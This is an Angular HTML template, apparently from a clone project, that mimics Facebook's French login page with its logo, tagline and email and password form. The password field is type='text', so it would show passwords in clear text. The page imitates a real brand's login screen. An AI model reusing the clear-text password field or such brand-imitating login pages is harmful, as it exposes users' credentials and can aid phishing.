<div class="login-container">

  <header class="login__header">
    <div class="login__header__left">
      <img alt="logo" src="assets/fb-logo-1.jpg">
      <h2>Avec Facebook, partagez et restez en contact avec votre entourage.</h2>
    </div>
    <div class="login__header__right">
      <mat-card class="login__header__right__card">
        <mat-card-content class="login__header__right__card__content">
          <form #form="ngForm" (ngSubmit)="login(form)" class="login-form">
            <input name="email" ngModel placeholder="Adresse e-mail ou numéro de tél." required type="text">
            <input name="password" ngModel placeholder="Mot de passe" required type="text">
            <button [disabled]="form.invalid || form.pending"
                    class="login-button"
                    *ngIf="!form.pending"
                    type="submit">Connexion
            </button>
          </form>
          <a>Mot de passe oublié?</a>
          <hr>
          <button class="create-account" (click)="openRegister()">Créer un compte</button>
        </mat-card-content>

      </mat-card>

      <p class="tagline"><strong>Créer une page</strong> our une célébrité, un groupe ou une entreprise.</p>
    </div>


  </header>


</div>